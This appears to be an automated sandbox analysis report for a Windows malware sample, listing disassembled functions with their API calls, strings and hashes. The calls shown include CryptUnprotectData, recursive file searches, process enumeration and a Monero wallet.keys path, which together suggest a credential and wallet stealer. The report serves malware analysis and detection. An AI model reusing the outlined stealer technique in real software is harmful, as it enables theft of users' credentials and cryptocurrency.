                          • Instruction ID: 8a3045d97897c1bb81b57b11c335180500696114d19637c831a1295e6d78dda9
                          • Opcode Fuzzy Hash: c91f58355619ce8ef608a7838a1a3c24529d5e6a5a93e5b1dc5e8252942753e9
                          • Instruction Fuzzy Hash: 00B205F3A0C2049FE3046E2DEC8567ABBE5EF94720F1A493DEAC5C7744EA3558048697
                          Function 00B07B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,00B105AF), ref: 00B07BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00B07BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00B07C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B07C62
                          • LocalFree.KERNEL32(00000000), ref: 00B07D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: a332e54496d375f670d3e93069bab158e44db25897119f7fe7087e4e61e4e5ec
                          • Instruction ID: 7b0d6eef04113d08b829c9d1006c996b9ec1aa95deb80d19a4649f33e2112836
                          • Opcode Fuzzy Hash: a332e54496d375f670d3e93069bab158e44db25897119f7fe7087e4e61e4e5ec
                          • Instruction Fuzzy Hash: A2416C71950218ABDB24DB94DC89BEEBBB8FF54700F2045D9E009A22D0DB346F85CFA1
                          Function 00EB827D Relevance: 10.4, Strings: 7, Instructions: 1667COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: *!~$2kc$o'7~$q}<$sH|\$sgf'$|`e{
                          • API String ID: 0-528901777
                          • Opcode ID: 48babd37685059f62f03d5a3ccbbf883321baa9254eb6d361bd2bd02f9f9dac2
                          • Instruction ID: 7121bc2f7cc6c7176a834b88d526af9b3a045b15dafd8c82e19627c91ce1b188
                          • Opcode Fuzzy Hash: 48babd37685059f62f03d5a3ccbbf883321baa9254eb6d361bd2bd02f9f9dac2
                          • Instruction Fuzzy Hash: 98B25AF3A082149FE3046E2DEC4567AB7E9EF94720F1A863DEAC5C7744EA3558018693
                          Function 00EB331D Relevance: 10.3, Strings: 7, Instructions: 1590COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: %u*$1VW[$=u^$A3w$Jw~_$Uj,z$n:z
                          • API String ID: 0-2621347867
                          • Opcode ID: f1627583fe8ef58f7764e5c9dc4ed919ebf0a4650ca17227e8741e27cfda21ec
                          • Instruction ID: 36796f21333d4dc53b4e90d430ea644a4a643adc5825e61764240fcaa9d7d2f4
                          • Opcode Fuzzy Hash: f1627583fe8ef58f7764e5c9dc4ed919ebf0a4650ca17227e8741e27cfda21ec
                          • Instruction Fuzzy Hash: EEB228F360C204AFE3046E2DEC4567AFBE9EF94720F1A493DEAC483744EA3558158697
                          Function 00EA9E65 Relevance: 9.6, Strings: 7, Instructions: 805COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: >)w$J};_$W_|$h[u$t5oz$tWe-$)_
                          • API String ID: 0-2342638888
                          • Opcode ID: 6b67f7004f23156be752117f1ee5b5662f5ee00f944bbe8d17582764cdc0f7e7
                          • Instruction ID: 5e274316ff9b0c34e4785c447109f9dc750c0b422e2c37718b7e200d155339b2
                          • Opcode Fuzzy Hash: 6b67f7004f23156be752117f1ee5b5662f5ee00f944bbe8d17582764cdc0f7e7
                          • Instruction Fuzzy Hash: 644209F360C2009FE304AE2DDC8576AFBE9EFD4760F1A892DE6C4C7744E63598058696
                          Function 00AFE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00B10D73), ref: 00AFE4A2
                          • StrCmpCA.SHLWAPI(?,00B114F8), ref: 00AFE4F2
                          • StrCmpCA.SHLWAPI(?,00B114FC), ref: 00AFE508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00AFEBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: 8179a203b683e91e646ca51f1e15e8efc9406152b561b4fbad3ebc37c56ca114
                          • Instruction ID: 9e74a7a4ae78d9c29d29d220dc4ca9219ed5d38ccec8e862dfce1182dd9ffd5d
                          • Opcode Fuzzy Hash: 8179a203b683e91e646ca51f1e15e8efc9406152b561b4fbad3ebc37c56ca114
                          • Instruction Fuzzy Hash: F9124871A103189ADB14FB60DD96EED77B9AF54300F4089E8B50AA61D1EF309F49CF92
                          Function 00EAE333 Relevance: 9.1, Strings: 6, Instructions: 1618COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 2G*c$7-r$C2M}$_No>$`bk$w8?/
                          • API String ID: 0-487351142
                          • Opcode ID: f800422cadcf16fcfe2093aae3b5e7d7cbd0fdb83f6cf0ada82c45e4c06b83f2
                          • Instruction ID: 48fea3052327517c4986422adfbf9d92dc81dd98f9ca3fd7571c51d526150a22
                          • Opcode Fuzzy Hash: f800422cadcf16fcfe2093aae3b5e7d7cbd0fdb83f6cf0ada82c45e4c06b83f2
                          • Instruction Fuzzy Hash: 67B2F4F360C200AFE3086F29EC8567AFBE9EF94720F1A492DE6C583740E63558458797
                          Function 00EBB9A6 Relevance: 9.1, Strings: 6, Instructions: 1613COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: "$mw$CTmy$Hx|k$ao{$kpwu$l^v
                          • API String ID: 0-1836109566
                          • Opcode ID: 0c9baf65c7141bcd56021d801005e76c8804a6287c18a70bd60904c0ba716891
                          • Instruction ID: 203846e85e9254cc99f10f296f7828d7c0c79675229b4b402e4c1106de7572b2
                          • Opcode Fuzzy Hash: 0c9baf65c7141bcd56021d801005e76c8804a6287c18a70bd60904c0ba716891
                          • Instruction Fuzzy Hash: A5B227F360C204AFE708AE2DEC8567AFBE9EF94320F16453DE6C4C3744EA7558058696
                          Function 00EB1954 Relevance: 9.0, Strings: 6, Instructions: 1514COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: '%]}$D,wo$J~o7$rvo$l/_$_{
                          • API String ID: 0-2591795313
                          • Opcode ID: 0ead957c881a568f874c16a0c7cc1a19ed4e3209e9e572e7270df1122f42ea94
                          • Instruction ID: ee6d2fb86c9cbb7a88acc2ceaf0141baabc698ee72d303ea00394ec93f60ecd1
                          • Opcode Fuzzy Hash: 0ead957c881a568f874c16a0c7cc1a19ed4e3209e9e572e7270df1122f42ea94
                          • Instruction Fuzzy Hash: 44B2C3F260C200AFE704AF29DC8567AFBE9EF94720F16892DE6C4C7744E63558418B97
                          Function 00AFC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00AFC871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00AFC87C
                          • lstrcat.KERNEL32(?,00B10B46), ref: 00AFC943
                          • lstrcat.KERNEL32(?,00B10B47), ref: 00AFC957
                          • lstrcat.KERNEL32(?,00B10B4E), ref: 00AFC978
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: 60bd92fa9af460ef7e4b9aef188f3faf7440cd5936929346b82a6266b3dbdb87
                          • Instruction ID: 089b63e6df4266a9eacb4b9ad73982a02545eab6d3d0620d1cb2add0c734b71e
                          • Opcode Fuzzy Hash: 60bd92fa9af460ef7e4b9aef188f3faf7440cd5936929346b82a6266b3dbdb87
                          • Instruction Fuzzy Hash: CA4142B5A0431EDBDB10DF94DD89BFEB7B8BB44704F1045A8F509A6280D7B45A84CFA1
                          Function 00AF7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00AF724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF7254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00AF7281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00AF72A4
                          • LocalFree.KERNEL32(?), ref: 00AF72AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: a2c6a97bb11f5cfb8b1fee899d9dcdec1a32c3f2877d2cf0d210cffacf7cff86
                          • Instruction ID: 795de38a9cddc78b94c7623cf26e30ecadd9151092712f2c0356cf4139e66e74
                          • Opcode Fuzzy Hash: a2c6a97bb11f5cfb8b1fee899d9dcdec1a32c3f2877d2cf0d210cffacf7cff86
                          • Instruction Fuzzy Hash: 650100B5B40308BBDB10DBD8DD49FAD77B8AB44700F104159FB45EA2C0D6B0AA008B65
                          Function 00B09600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B0961E
                          • Process32First.KERNEL32(00B10ACA,00000128), ref: 00B09632
                          • Process32Next.KERNEL32(00B10ACA,00000128), ref: 00B09647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 00B0965C
                          • CloseHandle.KERNEL32(00B10ACA), ref: 00B0967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
